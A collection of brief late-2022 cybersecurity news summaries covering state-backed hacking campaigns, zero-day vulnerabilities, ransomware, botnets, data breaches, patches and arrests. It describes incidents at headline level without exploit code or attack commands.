    Google: State Hackers Still Exploiting Internet Explorer Zero-Days

    Google's Threat Analysis Group (TAG) revealed today that a group of North Korean hackers tracked as APT37 exploited a previously unknown Internet Explorer vulnerability (known as a zero-day) to infect South Korean targets with malware. Google TAG was made aware of this recent attack on October 31 when multiple VirusTotal submitters from South Korea uploaded a malicious Microsoft Office document named "221031 Seoul Yongsan Itaewon accident response situation (06:00).docx." Once opened on the victims' devices, the document would deliver an unknown payload after downloading a rich text file (RTF) remote template that would render remote HTML using Internet Explorer. Loading the HTML content that delivered the exploit remotely allows the attackers to exploit the IE zero-day even if the targets weren't using it as their default web browser.

    Prolific Chinese Hackers Stole US COVID Funds

    A Chinese state-sponsored APT group has stolen at least $20m from US COVID-relief funds, in what appears to be a first-of-its-kind campaign, according to the Secret Service. The service told NBC that it linked prolific Chengdu-based APT41 to the raids, which targeted Small Business Administration (SBA) loans and unemployment insurance funds in more than 12 states. However, the true scale of the campaign may be much greater. The Secret Service said it has over 1000 investigations currently open into theft and fraud related to public benefits programs.

    New Zerobot Malware Has 21 Exploits for BIG-IP, Zyxel, D-Link Devices

    A new Go-based malware named ‘Zerobot’ has been spotted in mid-November using exploits for almost two dozen vulnerabilities in a variety of devices that include F5 BIG-IP, Zyxel firewalls, Totolink and D-Link routers, and Hikvision cameras. The purpose of the malware is to add compromised devices to a distributed denial-of-service (DDoS) botnet to launch powerful attacks against specified targets.

    Apple Rolls Out End-To-End Encryption for iCloud Backups

    Apple introduced today Advanced Data Protection for iCloud, a new feature that uses end-to-end encryption to protect sensitive iCloud data, including backups, photos, notes, and more. For customers who choose to enable this new security feature, Advanced Data Protection is designed to safeguard "most iCloud data even in the case of a data breach in the cloud" by ensuring that encrypted cloud data can only be decrypted on the users' trusted devices.

    New Go-based Botnet Exploiting Dozens of IoT Vulnerabilities to Expand its Network

    Fortinet Labs recently uncovered a new botnet dubbed Zerobot that is rapidly growing in number by exploiting dozens of security vulnerabilities in IoT devices. Zerobot is a Go-based botnet that comes with several modules, including self-replication, attacks for different protocols, and self-propagation. According to researchers, two versions of Zerobot have been spotted to date. The first one, which was used before November 24, contains basic functions, while the current version has been updated to include a “selfRepo” module, enabling it to reproduce itself and infect more devices with different protocols or vulnerabilities.

    Chinese Hackers Using Russo-Ukrainian War Decoys to Target APAC and European Entities

    The China-linked nation-state hacking group referred to as Mustang Panda is using lures related to the ongoing Russo-Ukrainian War to attack entities in Europe and the Asia Pacific. That's according to the BlackBerry Research and Intelligence Team, which analyzed a RAR archive file titled "Political Guidance for the new EU approach towards Russia.rar." Some of the targeted countries include Vietnam, India, Pakistan, Kenya, Turkey, Italy, and Brazil.

    Christmas Warning: Threat Actors Impersonate your Favorite Brands to Attack, Finds CSC

    In the run-up to Christmas, one of the busiest times for online shopping and e-commerce, we are likely to see a spike in fraudulent domain name registrations. Domain provider CSC analyzed threatening domains targeting 10 of the biggest brands in the world in a report published on December 6, 2022. These include Amazon, Walmart, McDonald’s, Tencent, Google, Microsoft, Apple and Facebook.

    Massive DDoS Attack Takes Russia’s Second-largest Bank VTB Offline

    Russia's second-largest financial institution VTB Bank says it is facing the worst cyberattack in its history after its website and mobile apps were taken offline due to an ongoing DDoS (distributed denial of service) attack. "At present, the VTB technological infrastructure is under unprecedented cyberattack from abroad," stated a VTB spokesperson to TASS (translated). "It is not only the largest cyberattack recorded this year, but in the entire history of the bank."

    Ransomware Attack in New Zealand Has Cascading Effects

    A ransomware attack on a New Zealand third-party managed IT service provider affected several government agencies across the country - including the Ministry of Justice and the national health authority. The Office of the Privacy Commissioner said "urgent work" is underway to understand the full impact of the incident. The third-party provider is Mercury IT, whose LinkedIn page describes it as a small business based in Wellington. It provides a wide range of IT services to customers throughout New Zealand, according to a one-page website on the company domain.

    Rackspace Confirms Outage Was Caused by Ransomware Attack

    Texas-based cloud computing provider Rackspace has confirmed today that a ransomware attack is behind an ongoing Hosted Exchange outage described as an "isolated disruption." In a statement the company said, "As you know, on Friday, December 2nd, 2022, we became aware of suspicious activity and immediately took proactive measures to isolate the Hosted Exchange environment to contain the incident."

    Severe AMI MegaRAC flaws impact servers from AMD, ARM, HPE, Dell, others

    In August, researchers at Eclypsium discovered a set of vulnerabilities in the American Megatrends MegaRAC Baseboard Management Controller (BMC) software which can be exploited by attackers under certain conditions to execute code, bypass authentication, and perform user enumeration. The flaws were discovered after researchers examined leaked proprietary code of American Megatrends, specifically the MegaRAC BMC firmware. MegaRAC BMC is a remote system management solution that allows admins to troubleshoot servers remotely as if they were standing in front of the device. As of writing, MegaRAC BMC firmware is used by at least 15 server manufacturers, including AMD, Ampere Computing, ASRock, Asus, ARM, Dell EMC, Gigabyte, Hewlett-Packard Enterprise, Huawei, Inspur, Lenovo, Nvidia, Qualcomm, Quanta, and Tyan.

    Russian Hackers Use Western Networks to Attack Ukraine

    Russian hackers are using their presence inside the networks of organizations in the UK, US and elsewhere to launch attacks against Ukraine, a new report from Lupovis has revealed. The Scottish security firm used a series of web decoys to lure Russian threat actors in an attempt to study their TTPs. Using a fake document leaked to cybercrime forums, the researchers leaked fake usernames, passwords, and other information that would entice actors to look further.

    Microsoft Warns of Russian Cyberattacks Throughout the Winter

    Microsoft has warned of Russian-sponsored cyberattacks continuing to target Ukrainian infrastructure and NATO allies in Europe throughout the winter. Redmond said in a report published over the weekend that it observed a pattern of targeted attacks on infrastructure in Ukraine by the Russian military intelligence threat group Sandworm in association with missile strikes. The attacks have been accompanied by a propaganda campaign to undermine Western support (from the U.S., EU, and NATO) for Ukraine: “We believe these recent trends suggest that the world should be prepared for several lines of potential Russian attack in the digital domain over the course of this winter. Russia will seek to exploit cracks in popular support for Ukraine to undermine coalitions essential to Ukraine's resilience, hoping to impair the humanitarian and military aid flowing to the region. We should also be prepared for cyber-enabled influence operations that target Europe to be conducted in parallel with cyberthreat activity.”

    ConnectWise Quietly Patches Flaw That Helps Phishers

    ConnectWise, which offers a self-hosted, remote desktop software application that is widely used by Managed Service Providers (MSPs), is warning about an unusually sophisticated phishing attack that can let attackers take remote control over user systems when recipients click the included link. The warning comes just weeks after the company quietly patched a vulnerability that makes it easier for phishers to launch these attacks.

    Critical Ping Bug Potentially Allows Remote Hack of FreeBSD Systems

    The maintainers of the FreeBSD operating system released updates to address a critical flaw, tracked as CVE-2022-23093, in the ping module that could be potentially exploited to gain remote code execution. A remote attacker can trigger the vulnerability, causing the ping program to crash and potentially leading to remote code execution in ping. The advisory for this issue reads: “ping reads raw IP packets from the network to process responses in the pr_pack() function. As part of processing a response ping has to reconstruct the IP header, the ICMP header and if present a ‘quoted packet,’ which represents the packet that generated an ICMP error. The quoted packet again has an IP header and an ICMP header.”

    SIM Swapper Gets 18 Months for Involvement in $22 Million Crypto Heist

    Florida man Nicholas Truglia was sentenced to 18 months in prison on Thursday for his involvement in a fraud scheme that led to the theft of millions from cryptocurrency investor Michael Terpin. The funds were stolen following a January 2018 SIM swap attack that allowed Truglia's co-conspirators to hijack Terpin's phone number and fraudulently transfer roughly $23.8 million in cryptocurrency from his crypto wallet to an online account under Truglia's control. According to the indictment, the defendant "agreed to convert the stolen cryptocurrency into Bitcoin, another form of cryptocurrency, and then transfer the Bitcoin to other Scheme Participants, while keeping a portion as payment for his services.” In all, Truglia kept at least approximately $673,000 of the stolen funds for assisting the other fraudsters in collecting and dividing the illegally obtained funds among them. The 25-year-old was ordered to pay a total of $20,379,007 to Terpin within the next 60 days, until January 30, 2023.

    New CryWiper Data Wiper Targets Russian Courts, Mayor’s Offices

    Since the start of the Russo-Ukraine war, Ukraine has been the target of wiper malware including DoubleZero, IsaacWiper, HermeticWiper, CaddyWiper, WhisperGate, AcidRain, and Industroyer2. Cybersecurity firm Kaspersky recently disclosed the discovery of yet another wiper malware dubbed CryWiper, which it says was used to attack an organization’s network in the Russian Federation. Russian media outlets also stated that the malware was used in attacks against Russian mayors’ offices and courts. According to Kaspersky, CryWiper masquerades as ransomware and extorts money from the victim for “decrypting” data, but in reality it does not actually encrypt anything and instead intentionally destroys data in the affected system, making recovery impossible.

    Google Chrome Emergency Update Fixes 9th Zero-day of the Year

    On Friday, Google released security updates to address a high-severity zero-day in its Chrome web browser. Tracked as CVE-2022-4262, the vulnerability is related to a type confusion weakness in the Chrome V8 JavaScript engine. “Even though type confusion security flaws generally lead to browser crashes after successful exploitation by reading or writing memory out of buffer bounds, threat actors can also exploit them for arbitrary code execution” (The Bleeping Computer, 2022). To address CVE-2022-4262, Google has released Chrome version 108.0.5359.94/.95 for Windows and version 108.0.5359.94 for macOS and Linux. Users have been advised to upgrade to the latest versions as soon as possible to mitigate potential threats.

    Tractors vs. Threat Actors: How to Hack a Farm

    ESET released an article on security challenges faced by modern UK farms. During a National Farmer’s Union (NFU) meeting in southern England, a farmer shared details about how his cows had recently “been hacked.” He noted that his farm used relatively high tech milking machines that were abused by a threat actor after he had clicked on a malicious email attachment. After his computer network went down, the farmer realized he had no way of knowing which cows had been milked, or which cows needed milking next. “Making things worse, it wasn’t just his cows that had been attacked, according to the farmer. All the farm’s online accounts had also been compromised and, therefore, his tractors had been taken offline, leaving him with no information on which of his fields had been cropped or still needed cropping, as the tractor usually plans out the routes via his online accounts.”

    Cuba Ransomware Raked in $60 Million From Over 100 Victims

    This is a follow-up to another advisory issued one year ago, which warned that the cybercrime group compromised dozens of organizations from U.S. critical infrastructure sectors, making over $40 million since it started targeting U.S. companies. "Since the release of the December 2021 FBI Flash, the number of U.S. entities compromised by Cuba ransomware has doubled, with ransoms demanded and paid on the increase."

    New Redigo Malware Drops Stealthy Backdoor on Redis Servers

    The Go-based malware threat that researchers call Redigo has been targeting Redis servers vulnerable to CVE-2022-0543 to plant a stealthy backdoor and allow command execution. CVE-2022-0543 is a critical vulnerability in Redis (Remote Dictionary Server) software with a maximum severity rating. It was discovered and fixed in February 2022. As usual, attackers continued to leverage it on unpatched machines several months after the fix came out, as proof-of-concept exploit code became publicly available.

    Android Malware Infected 300,000 Devices to Steal Facebook Accounts

    An Android malware campaign masquerading as reading and education apps has been underway since 2018, attempting to steal Facebook account credentials from infected devices. According to a new report by Zimperium, the campaign has infected at least 300,000 devices across 71 countries, primarily focusing on Vietnam. Some apps used for spreading the trojan, which Zimperium named 'Schoolyard Bully,' were previously on Google Play but have since been removed. However, Zimperium warns that the apps continue to be spread through third-party Android app stores.

    Researchers Disclose Supply-Chain Flaw Affecting IBM Cloud Databases for PostgreSQL

    IBM recently addressed a high-severity flaw impacting its Cloud Databases (ICD) for PostgreSQL product that could be exploited to tamper with internal repositories and execute malicious code. Dubbed “Hell’s Keychain” by cloud security firm Wiz, the vulnerability is related to a privilege escalation flaw that allows a malicious threat actor to gain superuser (aka “ibm”) privileges and remotely execute code to read and modify the data stored in the PostgreSQL database.

    Samsung, LG, Mediatek Certificates Compromised to Sign Android Malware

    Multiple platform certificates used by Android OEM device vendors to digitally sign core system applications have also been used to sign Android apps containing malware. OEM Android device manufacturers use platform certificates, or platform keys, to sign devices' core ROM images containing the Android operating system and associated apps.

    New DuckLogs Malware Service Claims to Have Thousands of ‘Customers’

    A new malware-as-a-service (MaaS) operation named 'DuckLogs' has emerged, giving low-skilled attackers easy access to multiple modules to steal information, log keystrokes, access clipboard data, and remotely access the compromised host. DuckLogs is entirely web-based. It claims to have thousands of cybercriminals paying a subscription to generate and launch more than 4,000 malware builds.

    LastPass Suffers Another Security Breach; Exposed Some Customers' Information

    Popular password management service LastPass said it's investigating a second security incident that involved attackers accessing some of its customer information: “We recently detected unusual activity within a third-party cloud storage service, which is currently shared by both LastPass and its affiliate, GoTo.” GoTo, formerly called LogMeIn, acquired LastPass in October 2015. In December 2021, the Boston-based firm announced plans to spin off LastPass as an independent company. The digital break-in resulted in the unauthorized third party leveraging information obtained following a previous breach in August 2022 to access “certain elements of our customers' information.”

    Cybersecurity Researchers Take Down DDoS Botnet by Accident

    While analyzing its capabilities, Akamai researchers have accidentally taken down a cryptomining botnet that was also used for distributed denial-of-service (DDoS) attacks. As revealed in a report published earlier this month, the KmsdBot malware behind this botnet was discovered by members of the Akamai Security Intelligence Response Team (SIRT) after it infected one of their honeypots. KmsdBot targets Windows and Linux devices with a wide range of architectures, and it infects new systems via SSH connections that use weak or default login credentials. Compromised devices are being used to mine for cryptocurrency and launch DDoS attacks, with some of the previous targets being gaming and technology companies, as well as luxury car manufacturers.

    Google Accuses Spanish Spyware Vendor of Exploiting Chrome, Firefox, and Windows Zero-Days

    A Barcelona-based surveillanceware vendor named Variston IT is said to have surreptitiously planted spyware on targeted devices by exploiting several zero-day flaws in Google Chrome, Mozilla Firefox, and Windows, some of which date back to December 2018. ‘Their Heliconia framework exploits n-day vulnerabilities in Chrome, Firefox, and Microsoft Defender, and provides all the tools necessary to deploy a payload to a target device,’ Google Threat Analysis Group (TAG) researchers Clement Lecigne and Benoit Sevens said in a write-up. Variston, which has a bare-bones website, claims to ‘offer tailor made Information Security Solutions to our customers,’ ‘design custom security patches for any kind of proprietary system,’ and support ‘the discovery of digital information by [law enforcement agencies],’ among other services.

    New Windows Malware Scans Victims’ Mobile Phones for Data to Steal

    Security researchers found a previously unknown backdoor they call Dolphin that's been used by North Korean hackers in highly targeted operations for more than a year to steal files and send them to Google Drive storage. According to research from cybersecurity company ESET, the APT37 threat group (a.k.a. Reaper, Red Eyes, Erebus, ScarCruft) used the newly discovered malware against very specific entities. The group has been associated with espionage activity aligning with North Korean interests since 2012.

    Android and iOS Loan Apps With 15 Million Installs Extorted Borrowers

    Over 280 Android and iOS apps on the Google Play and the Apple App stores trapped users in loan schemes with misleading terms and employed various methods to extort and harass borrowers. To fuel the operation's extortion attempts, the apps stole excessive amounts of data from mobile phones not usually required to offer loans. In a new report by cybersecurity firm Lookout, researchers uncovered 251 Android and 35 iOS lending apps that were downloaded a combined total of 15 million times, mostly by users in India, Colombia, Mexico, Nigeria, Thailand, the Philippines, and Uganda. Lookout reported all of them to Google and Apple for removal, and all of them have since been taken down.

    Irish Regulator Fines Facebook $277 Million for Leak of Half a Billion Users' Data

    Ireland's Data Protection Commission (DPC) has levied fines of €265 million ($277 million) against Meta Platforms for failing to safeguard the personal data of more than half a billion users of its Facebook service, ramping up privacy enforcement against U.S. tech firms. The fines follow an inquiry initiated by the European regulator on April 14, 2021, close on the heels of a leak of a "collated dataset of Facebook personal data that had been made available on the internet."

    Trigona Ransomware Spotted in Increasing Attacks Worldwide

    A previously unnamed ransomware has rebranded under the name 'Trigona,' launching a new Tor negotiation site where they accept Monero as ransom payments. Trigona has been active for some time, with samples seen at the beginning of the year. However, those samples utilized email for negotiations and were not branded under a specific name. As discovered by MalwareHunterTeam, starting in late October 2022, the ransomware operation launched a new Tor negotiation site where they officially named themselves 'Trigona.' As Trigona is the name of a family of large stingless bees, the ransomware operation has adopted a logo showing a person in a cyber bee-like costume.

    Researchers Find a Way Malicious NPM Libraries Can Evade Vulnerability Detection

    New findings from cybersecurity firm JFrog show that malware targeting the npm ecosystem can evade security checks by taking advantage of an "unexpected behavior" in the npm command line interface (CLI) tool. npm CLI's install and audit commands have built-in capabilities to check a package and all of its dependencies for known vulnerabilities, effectively acting as a warning mechanism for developers by highlighting the flaws. But as JFrog established, the security advisories are not displayed when the packages follow certain version formats, creating a scenario where critical flaws could be introduced into their systems either directly or via the package's dependencies.

    Oracle Fusion Middleware Vulnerability Actively Exploited in the Wild: CISA

    The US Cybersecurity and Infrastructure Security Agency (CISA) added a critical flaw affecting Oracle Fusion Middleware systems to its Known Exploited Vulnerabilities (KEV) Catalog on Monday. The bug, which CISA confirmed has been exploited in the wild, allows unauthenticated attackers with network access via HTTP to compromise Oracle Access Manager. Successful attacks targeting this vulnerability can consequently result in the program's takeover.

    Acer Fixes UEFI Bugs That Can Be Used to Disable Secure Boot

    Acer has fixed a high-severity vulnerability affecting multiple laptop models that could enable local attackers to deactivate UEFI Secure Boot on targeted systems. The Secure Boot security feature blocks untrusted operating system bootloaders on computers with a Trusted Platform Module (TPM) chip and Unified Extensible Firmware Interface (UEFI) firmware, to prevent malicious code like rootkits and bootkits from loading during the startup process.

    Experts Found a Vulnerability in AWS Appsync

    “Amazon Web Services (AWS) has addressed a cross-tenant confused deputy problem in its platform that could have allowed threat actors to gain unauthorized access to resources. The problem was reported to the company by researchers from Datadog on September 1, 2022, and the bug was solved on September 6.” “A confused deputy problem occurs when an entity that doesn’t have permission to perform an action can coerce a more-privileged entity to perform the action. AWS provides tools to protect an account if the owner provides third parties (known as cross-account) or other AWS services (known as cross-service) access to resources in your account.”

    Trio of New Vulnerabilities Found in Industrial Controllers

    Researchers at Vedere Labs disclosed a trio of new security vulnerabilities that can be used to attack automated industrial controllers and a popular piece of software used to program millions of smart devices in critical infrastructure. The bugs (tracked under CVE-2022-4048, CVE-2022-3079 and CVE-2022-3270) allow for logic manipulation and denial of service, primarily impacting products from two major German vendors: Festo automated controllers and the CODESYS runtime, an application that allows developers to program smart devices and is, according to Vedere Labs, “used by hundreds of device manufacturers in different industrial sectors.”

    US Bans Sales of Huawei, Hikvision, ZTE, and Dahua Equipment

    The Federal Communications Commission adopted new rules prohibiting communications equipment deemed to pose an unacceptable risk to national security from being authorized for importation or sale in the United States. The U.S. ban covers not only the parent companies but their subsidiaries and affiliates as well. The new rules prohibit the authorization of equipment through the FCC’s Certification process and make clear that such equipment cannot be authorized under the Supplier’s Declaration of Conformity process or be imported or marketed under rules that allow exemption from an equipment authorization.

    5.4 Million Twitter Users’ Stolen Data Leaked Online — More Shared Privately

    The data consists of scraped public information as well as private phone numbers and email addresses that are not meant to be public. While most of the data consisted of public information, such as Twitter IDs, names, login names, locations, and verified status, it also included private information, such as phone numbers and email addresses. Pompompurin, the owner of the Breached hacking forum, told BleepingComputer this weekend that they were responsible for exploiting the bug and creating the massive dump of Twitter user records after another threat actor known as 'Devil' shared the vulnerability with them. In addition to the 5.4 million records for sale, there were also an additional 1.4 million Twitter profiles for suspended users collected using a different API, bringing the total to almost 7 million Twitter profiles containing private information.

    New Ransomware Attacks in Ukraine Linked to Russian Sandworm Hackers

    On November 21, ESET uncovered a new wave of ransomware dubbed RansomBoggs being deployed in the networks of multiple Ukrainian organizations. According to researchers, the deployment of the new malware is very similar to the previous Industroyer2 attacks which were attributed to Sandworm, a notorious Russian military threat group. “There are similarities with previous attacks conducted by Sandworm: a PowerShell script used to distribute the .NET ransomware from the domain controller is almost identical to the one seen last April during the Industroyer2 attacks against the energy sector,” stated ESET in its post on Twitter. The PowerShell script which CERT-UA refers to as POWERGAP was also used to deploy CaddyWiper (destructive data wiper malware) using Arguepatch (malware loader) in attacks against Ukrainian organizations in March.

    Google Pushes Emergency Chrome Update to Fix 8th Zero-Day in 2022

    Google recently released security updates to address a high-severity heap buffer overflow in the GPU component of the Chrome web browser. The vulnerability is being tracked as CVE-2022-4135 and was uncovered by Clement Lecigne of Google's Threat Analysis Group on November 22, 2022. As usual, the technical details of the vulnerability have yet to be released, to give users enough time to apply the security updates.

    Microsoft Warns: Forgotten Open-source Web Server Could Let Hackers 'Silently' Gain Access to Your SDKs

    Microsoft shared details on an open-source software (OSS) supply chain incident, after looking into an April 2022 report by security vendor Recorded Future about a “likely Chinese State-sponsored” threat actor targeting Indian power companies. Recorded Future found dozens of indicators between late 2021 and Q1 2022 that were used in intrusions against multiple organizations in India’s energy sector. Microsoft notes the latest related activity was in October 2022, and says its researchers identified a "vulnerable component on all the IP addresses published as IOCs" by Recorded Future and that it found evidence of a "supply chain risk that may affect millions of organizations and devices."

    Russian Cybergangs Stole Over 50 Million Passwords This Year

    At least 34 distinct Russian-speaking cybercrime groups using info-stealing malware like Raccoon and Redline have collectively stolen 50,350,000 account passwords from over 896,000 individual infections from January to July 2022. The stolen credentials were for cryptocurrency wallets, Steam, Roblox, Amazon, and PayPal accounts, as well as payment card records. According to a report from Group-IB, whose analysts have been tracking these operations globally, most victims are based in the United States, Germany, India, Brazil, and Indonesia, but the malicious operations targeted 111 countries.

    Ducktail Malware Operation Evolves with New Malicious Capabilities

    Operators of the Ducktail information stealer have returned, introducing new malicious capabilities. Ducktail is malware designed to siphon browser cookies and take advantage of authenticated Facebook sessions to steal information from victims and run ads on their accounts for monetary gain. The info-stealer is attributed to a Vietnamese threat actor known for targeting businesses in the digital marketing and advertising sectors that are active on the Facebook Ads and Business platform. “Also targeted are individuals within prospective companies that are likely to have high-level access to Facebook Business accounts. This includes marketing, media, and human resources personnel.”

    Backdoored Chrome Extension Installed by 200,000 Roblox Players

    'SearchBlox,' a Chrome extension installed by more than 200,000 users, has been discovered to contain a backdoor that can steal your Roblox credentials and your assets on Rolimons, a Roblox trading platform. After analysis of the extension code, which indicated the presence of a backdoor, it has been suggested the backdoor was introduced either intentionally by its developer or after an initial compromise. The extension claims to allow users to "search Roblox servers for the desired player... blazingly fast." Suspicions arose among Roblox community members that SearchBlox contained malware after someone tweeted that the popular plug-in SearchBlox has been COMPROMISED / BACKDOORED and that, if you have it, your account may be at risk.

    Hackers Breach Energy Orgs via Bugs in Discontinued Web Server

    Microsoft said today that security vulnerabilities found to impact a web server discontinued since 2005 have been used to target and compromise organizations in the energy sector. Recorded Future revealed in a report published in April that state-backed Chinese hacking groups (including one traced as RedEcho) targeted multiple Indian electrical grid operators, compromising an Indian national emergency response system and the subsidiary of a multinational logistics company.

    Black Basta Using QBot Malware to Target US-Based Companies

    Researchers say Black Basta is dropping QBot malware - also called QakBot - in a widespread ransomware campaign targeting mostly U.S.-based companies. In the group's latest campaign, attackers are again using QBot to install a backdoor and then drop in encryption malware and other malicious code, according to Cybereason.

    Experts Warn Threat Actors May Abuse Red Team Tool Nighthawk

    Security researchers are warning that a new red-teaming tool dubbed “Nighthawk” may soon be leveraged by threat actors. Created in late 2021 by MDSec, the tool is best described as an advanced C2 framework, which functions like Cobalt Strike and Brute Ratel as a commercially distributed remote access trojan (RAT) designed for legitimate use.

    Hospital Workers Charged with Selling Patient Information

    The U.S. Justice Department in a statement says a federal grand jury on Nov. 10 indicted five former employees of Memphis, Tennessee-based Methodist Le Bonheur Healthcare with accessing and disclosing patient information to a sixth individual, Roderick Harvey, without the knowledge, consent or authorization of the patients. Four of the employees worked as financial counselors at Methodist Healthcare, and one of the individuals held a variety of roles, including PBX unit secretary, according to court documents. The longest-tenured employee, Taylor, worked in the hospital's emergency room as a financial counselor for 18 years, according to court documents.

    Emotet Is Back and Delivers Payloads Like Icedid and Bumblebee

    In April, the operators of the infamous Emotet botnet started testing new attack techniques in response to Microsoft’s move to disable Visual Basic for Applications (VBA) macros by default. In June, Proofpoint experts spotted a new variant of the Emotet bot that uses a new module to steal credit card information stored in the Chrome web browser. The experts noticed multiple changes to the bot and its payloads, and the operators introduced changes to the malware modules, loader, and packer. Proofpoint summarized the spamming activity it observed: “The volume of emails that Emotet sending bots attempt to deliver each day is in the hundreds of thousands. These numbers are comparable to historic averages. Hence, it does not appear that the Emotet botnet lost any significant spamming capability during the inactive period,” reads the report published by Proofpoint.

    Chinese 'Mustang Panda' Hackers Actively Targeting Governments Worldwide

    A notorious advanced persistent threat actor known as Mustang Panda has been linked to a spate of spear-phishing attacks targeting government, education, and research sectors across the world. The primary targets of the intrusions from May to October 2022 included countries in the Asia Pacific region such as Myanmar, Australia, the Philippines, Japan, and Taiwan, cybersecurity firm Trend Micro said in a Friday report.

    Google Provides Rules to Detect Tens of Cracked Versions of Cobalt Strike

    Google Cloud researchers announced that they had discovered 34 different hacked Cobalt Strike release versions, with a total of 275 unique JAR files across these versions. Google Cloud Threat Intelligence (GCTI) researchers developed a set of YARA rules to detect hacked variants in the wild with a high degree of accuracy. The researchers noticed that each Cobalt Strike version contains approximately 10 to 100 attack template binaries. The experts were able to locate versions of the Cobalt Strike JAR file starting with version 1.44 (which was released in 2012) up to the latest version at the time of publishing the analysis, Cobalt Strike 4.7.

    New Ransomware Encrypts Files, Then Steals Your Discord Account

    When a user logs into Discord with their credentials, the platform sends back a user authentication token saved on the computer. This token can then be used to log in as the user or to issue API requests that retrieve information about the associated account. Threat actors commonly attempt to steal these tokens because they enable them to take over accounts or, even worse, abuse them for further malicious attacks.

    Netflix Phishing Emails Surge 78%

    Researchers from Egress detailed an increase in phishing campaigns spoofing the Netflix brand since October, noting a 78% increase in impersonation attacks against the brand. If employees use the same credentials for personal accounts like Netflix as for their work accounts, campaigns like this may impact corporate systems and data, warned Egress. The group behind the attacks is using Unicode characters to bypass natural language processing (NLP) scanning, which prevents traditional anti-phishing filters from catching it. “Unicode helps to convert international languages within browsers – but it can also be used for visual spoofing by exploiting international language characters to make a fake URL look legitimate,” Egress wrote.

    Atlassian Fixes Critical Command Injection Bug in Bitbucket Server

    Atlassian has released updates to address critical-severity vulnerabilities in its centralized identity management platform, Crowd Server and Data Center, and in Bitbucket Server and Data Center, the company's solution for Git repository management. Both security vulnerabilities received a severity rating of 9 out of 10 (calculated by Atlassian) and affect multiple versions of the products.

    Previously Unidentified ARCrypter Ransomware Expands Worldwide

    A previously unknown ‘ARCrypter’ ransomware that compromised key organizations in Latin America is now expanding its attacks worldwide. Threat actors behind the new ransomware family attacked a government agency in Chile last August, targeting both Linux and Windows systems and appending the “.crypt” extension on encrypted files. Back then, Chilean threat analyst Germán Fernández told BleepingComputer that the strain appeared entirely new, not connected to any known ransomware families. Researchers at BlackBerry have confirmed this via a report that identifies the family as ARCrypter and links it to a second attack against the Colombia National Food and Drug Surveillance Institute (Invima) in October.

    TLP: CLEAR - HIVE RANSOMWARE

    Today, CISA, the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS) released joint Cybersecurity Advisory (CSA) #StopRansomware: Hive Ransomware to provide network defenders tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with Hive ransomware variants. FBI investigations identified these TTPs and IOCs as recently as November 2022.

    FBI-Wanted Leader of the Notorious Zeus Botnet Gang Arrested in Geneva

    A Ukrainian national who has been wanted by the U.S. for over a decade has been arrested by Swiss authorities for his role in a notorious cybercriminal ring that stole millions of dollars from victims' bank accounts using malware called Zeus. Vyacheslav Igorevich Penchukov, who went by the online pseudonyms "tank" and "father," is said to have been involved in the day-to-day operations of the group. He was apprehended on October 23, 2022, and is pending extradition to the U.S. Details of the arrest were first reported by independent security journalist Brian Krebs.

    High Severity Vulnerabilities Reported in F5 BIG-IP and BIG-IQ Devices

    Cybersecurity firm Rapid7 recently disclosed two high-severity vulnerabilities in F5 BIG-IP and BIG-IQ devices which could enable complete device takeover upon successful exploitation. The first flaw, which is being tracked as CVE-2022-41622, is a cross-site request forgery vulnerability in BIG-IP and BIG-IQ products and can allow a malicious threat actor to execute code remotely without authentication.

    Ukrainian CERT Discloses New Data-Wiping Campaign

    Ukrainian cyber-experts have discovered a new attack campaign by suspected Russian threat actors that compromises victims’ VPN accounts to access and encrypt networked resources. The country’s Computer Emergency Response Team (CERT) noted in a new statement that the so-called Somnia ransomware was being used by the FRwL (aka Z-Team), also identified as UAC-0118.

    U.S. Charges Russian Suspects With Operating Z-Library E-book Site

    Z-Library is described as "one of the world's largest public and free-to-access written content repositories, containing 11 million books and 84 million articles in a massive 220 TB database" and as a volunteer-run project with no commercial direction. However, at some point, it started offering paid memberships in exchange for premium features.

    Microsoft Urges Devs to Migrate Away From .Net Core 3.1 ASAP

    Microsoft has urged developers still using the long-term support (LTS) release of .NET Core 3.1 to migrate to the latest .NET versions before it reaches the end of support (EOS) next month. The company warned customers on the Windows message center to upgrade to .NET 6 (LTS) or .NET 7 "as soon as possible" before .NET Core 3.1 (LTS) reaches EOS on December 13, 2022.

    Study: Electronics Repair Technicians Snoop on Your Data

    When your computer or smartphone needs repairing, can you trust repair technicians not to access or steal your data? According to the results of recent research by scientists at the University of Guelph, Canada, you shouldn’t. Granted, they tested only 16 repair service providers with rigged devices, but in six cases, technicians snooped on customers’ data, and in two, they copied the data to external devices. Oh, and most of them tried to cover their tracks, either by removing evidence (e.g., by clearing items in the “Quick Access” or “Recently Accessed Files” on Microsoft Windows) or by trying not to generate it (e.g., by just zooming in on photo thumbnails).

    New Rapperbot Campaign Targets Game Servers With DDoS Attacks

    Researchers from FortiGuard Labs discovered the previously undetected RapperBot IoT botnet in August, and reported that it has been active since mid-June 2022. The bot borrows a large portion of its code from the original Mirai botnet, but unlike other IoT malware families, it implements a built-in capability to brute-force credentials and gain access to SSH servers instead of Telnet as implemented in Mirai.

    North Korean Hackers Target European Orgs With Updated Malware

    North Korean hackers are using a new version of the DTrack backdoor to attack organizations in Europe and Latin America. DTrack is a modular backdoor featuring a keylogger, a screenshot snapper, a browser history retriever, a running processes snooper, an IP address and network connection information snatcher, and more. Apart from spying, it can also run commands to perform file operations, fetch additional payloads, steal files and data, and execute processes on the compromised device. The new malware version doesn't feature many functional or code changes compared to samples analyzed in the past, but it is now deployed far more widely.

    Researchers Discover Hundreds of Amazon RDS Instances Leaking Users' Personal Data

    Researchers recently uncovered hundreds of databases on Amazon Relational Database Service (Amazon RDS) which are exposing personally identifiable information (PII). "Amazon RDS is a web service that makes it possible to set up relational databases in the Amazon Web Services (AWS) cloud. It offers support for different database engines such as MariaDB, MySQL, Oracle, PostgreSQL, and SQL Server."

    China-Based Campaign Uses 42,000 Phishing Domains

    Security researchers have uncovered a sophisticated phishing campaign using tens of thousands of malicious domains to spread malware and generate advertising revenue. Dubbed “Fangxiao,” the group directs unsuspecting users to the domains via WhatsApp messages telling them they’ve won a prize, according to security vendor Cyjax. The phishing site landing pages apparently impersonate hundreds of well-known brands including Emirates, Unilever, Coca-Cola, McDonald’s and Knorr. The victims will be redirected to advertising sites, which Fangxiao generates money from, en route to a fake survey where it's claimed they can win a prize.

    Chinese Hackers Target Government Agencies and Defense Orgs

